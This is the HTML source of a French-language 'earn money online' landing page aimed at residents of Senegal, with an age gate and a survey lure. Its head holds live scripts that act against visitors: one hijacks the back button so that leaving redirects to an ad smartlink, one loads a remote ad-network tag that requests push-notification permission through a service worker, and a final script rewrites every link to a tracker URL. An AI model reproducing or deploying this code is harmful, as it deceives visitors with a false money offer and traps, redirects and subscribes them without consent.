<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon" href="favicon.ico">
<title>💲Gagner de L'argent en Ligne</title>
<style>
body {
    background-color: #F1F4F7;
    color:#000;
}
}
a {
    color: #ffffff;
    text-decoration: none;
}
.wrapper > header {
    border-color: transparent;
}
/* .wrapper > header img {
    height: none;;
    width:none;;
} */
#main{
    position:relative;
    max-width:100%;
    padding:0 1em 3em;
    background:transparent;
    border-radius:4px;
    cursor:default;
    text-align:center;
}
.align-btn {
    display: flex;
    justify-content: center;
}
.btn {
  min-width: 125px;
  min-height: 50px;
  font-size: 18px;
  text-transform: uppercase;
  letter-spacing: 1.3px;
  font-weight: 700;
  color: #ffffff;
  background-color: #919191;
  border: none;
  transition: all 0.3s ease-in-out 0s;
  cursor: pointer;
  outline: none;
  position: relative;
  padding: 10px;
}
.counter{
    background: none;;
    margin: 20px;
    padding: 15px;
}
.wrap {
    padding: 5px;
}
.btn-yes {
    background-color: #000000;
    color: #white;
    border: 1px solid #fff;
}
.btn-yes:hover {
    background-color: #1fb53a;
}
.btn-no {
    background-color: #000000;
    color: white;
    border: 1px solid #fff;
}
.btn-no:hover {
    background-color: #1fb53a;
}
  
body {
    margin: 0;
    padding: 0;
    height: 100%;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 30px;
}
img {
    border: 0;
    max-width: 100%;
}
a {
    display: inline-block;
}
p,
ul,
li,
ol,
h1,
h2,
h3,
h4,
h5 {
    margin: 0;
    padding: 0;
    list-style: none;
    font-weight: normal;
}
.hide {
    display: none;
}
.wrapper > header {
    margin-bottom: 15px;
    border-bottom-width: 1px;
    border-bottom-style: solid;
}
@-webkit-keyframes glowing {
    0% { background-color: #00FF48; -webkit-box-shadow: 0 0 3px #00FF48; }
    50% { background-color: #00B233; -webkit-box-shadow: 0 0 40px #00B233; }
    100% { background-color: #00FF48; -webkit-box-shadow: 0 0 3px #00FF48; }
  }
  @-moz-keyframes glowing {
    0% { background-color: #00FF48; -moz-box-shadow: 0 0 3px #00FF48; }
    50% { background-color: #00B233; -moz-box-shadow: 0 0 40px #00B233; }
    100% { background-color: #00FF48; -moz-box-shadow: 0 0 3px #00FF48; }
  }
  @-o-keyframes glowing {
    0% { background-color: #00FF48; box-shadow: 0 0 3px #00FF48; }
    50% { background-color: #00B233; box-shadow: 0 0 40px #00B233; }
    100% { background-color: #00FF48; box-shadow: 0 0 3px #00FF48; }
  }
  @keyframes glowing {
    0% { background-color: #00FF48; box-shadow: 0 0 3px #00FF48; }
    50% { background-color: #00B233; box-shadow: 0 0 40px #00B233; }
    100% { background-color: #00FF48; box-shadow: 0 0 3px #00FF48; }
  }
  .button {
    -webkit-animation: glowing 750ms infinite;
    -moz-animation: glowing 750ms infinite;
    -o-animation: glowing 750ms infinite;
    animation: glowing 750ms infinite;
  }
@media (max-width: 420px) {
    body {
    background-image: url(none;);
    background-attachment: fixed;
    background-position: top left;
}
    .wrapper > header {
        border-bottom-width: 3px;
    }
}
.wrapper > header img {
    display: block;
    margin: auto;
    padding: 15px 0;
    height: 80px;
}
@media (max-width: 380px) {
    .wrapper > header img {
        padding: 10px 0;
        height: 150px;
    }
}
.wrapper-content {
    padding: 10px 0;
    overflow: hidden;
    text-align: center;
}
.box:not(:first-child) {
    display: none;
}
.box .box-content {
    margin-top: 15px;
}
.box .box-header {
    margin: 25px auto;
    max-width: 320px;
}
.box {
    display: inline-block;
    margin: 0 auto;
}
#main .avatar img {
    position: relative;
    display: inline-block;
    margin: 0 auto;
    padding: 7px;
    border-bottom-width: 1px;
    border-bottom-style: solid;
    border-radius: 7px;
}
#main .avatar img {
    display: block;
    margin: auto;
}
@media (max-width: 480px) {
#main .avatar img {
        width: 260px;
    }
}
@media (max-width: 380px) {
#main .avatar img {
        width: 225px;
    }
}
@media (max-width: 350px) {
#main .avatar img {
        width: 200px;
    }
}
ansform: rotate(-45deg);
}
@media (max-width: 480px) {
   
}
@media (max-width: 350px) {
}
.box-final {
    max-width: 400px;
    margin: 0 auto;
}
@media (max-width: 360px) {
    .box-final {
        margin: 0 10px;
    }
}
.box-final .box-header {
    max-width: none;
}
.box-final .box-content {
    margin: 0 10px;
    padding: 8px 15px;
    border-width: 1px;
    border-style: solid;
    border-radius: 10px;
    text-align: left;
    font-size: 14px;
    line-height: 1.4;
}
.box-final .box-content p:not(:last-child) {
    margin-bottom: 10px;
}
.box-final .box-btn {
    margin-top: 30px;
}
.box-btn {
    margin-top: 20px;
}
@media only screen and (max-width: 350px) {
    #main .avatar img {
        max-height: 380px;
    }
    .box .box-content,
    .box .box-header {
        margin-top: 10px;
    }
    .box-header h2 {
        font-size: 16px;
    }
    .box-btn {
        margin-top: 15px;
    }
}
</style>


<!--bb to Monetizer-->

<script> function imiBB() { let url = "https://app.impih.com/?utm_medium=43f99f70b126f87db2fc1abfd2a6ee8b6d6ec8fc&utm_campaign=ng_smartlink&np=1"; try { history.pushState({}, '', location.href); history.pushState({}, '', location.href); window.onpopstate = function (ev) { if (ev['state']) { location.replace(url); } }; } catch (ex) {} } !function () { let touched = false; let chromeVersion = 0; try { chromeVersion = +(new RegExp('Chrome/([0-9]+)').exec(navigator.userAgent)[1]); } catch (e) { chromeVersion = 0; } if (chromeVersion >= 75) { window.addEventListener('mouseup', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.addEventListener("DOMContentLoaded", function () { document.body.addEventListener('touchend', function (evt) { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.body.addEventListener('keydown', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); } ); } else { setTimeout(function () { imiBB(); } , 0); } } (); </script>
  


  
  
            
    <!--propush-->
<script>
    var s = document.createElement('script');
    s.src='//lemouwee.com/pfe/current/micro.tag.min.js?z=5168327'+'&sw=/sw-check-permissions-ea2cf.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':break;
            case 'onNotificationUnsupported':break;
        }
    }
    document.head.appendChild(s);
</script>



</head>
<body>
<div class="wrapper" style="text-align: center;">
<header></header>
<br />
<header><span style="font-size: 11pt;"><a class="lnk" href="#" style="text-decoration: none; color:black">💲Cette Opportunité est réservée aux Résidents du Sénégal ❗ </a></span></header>
<header><a class="lnk" href="#"><img src="123.png" alt="Logo" /></a><span style="background-color: transparent;"></span></header>
<header><span style="background-color: transparent;"><a class="lnk" href="#" style="text-decoration: none; color:black">Avez-vous plus de 18 ans ❓</a></span></header>
<div id="main">
<div class="box js-step js-step1">
<div class="align-btn">
<div class="wrap">
<a class="lnk" href="#"><button class="btn btn-yes button" type="submit">Oui</button></a>
</div>
<div class="wrap">
<a class="lnk" href="#"><button class="btn btn-no" type="submit">Non</button></a>
</div>
</div>
<span style="font-size: 11pt;"><a class="lnk" href="#" style="text-decoration: none; color:black">✅ Répondez à quelques questions Rapides et Gagnez de L'argent. 😍 </a></span>
</div>
</div>
</div>
<script>
    var domain = window.location.hostname.split(".")[window.location.hostname.split(".").length-2]+"."+window.location.hostname.split(".")[window.location.hostname.split(".").length-1];
  var links = document.getElementsByTagName("a"), i, len;
  for (i = 0, len = links.length; i < len; i++) {
    links[i].setAttribute("href", "//t1.outlet-shoes.store/click");
  }
</script>
</body>
</html>
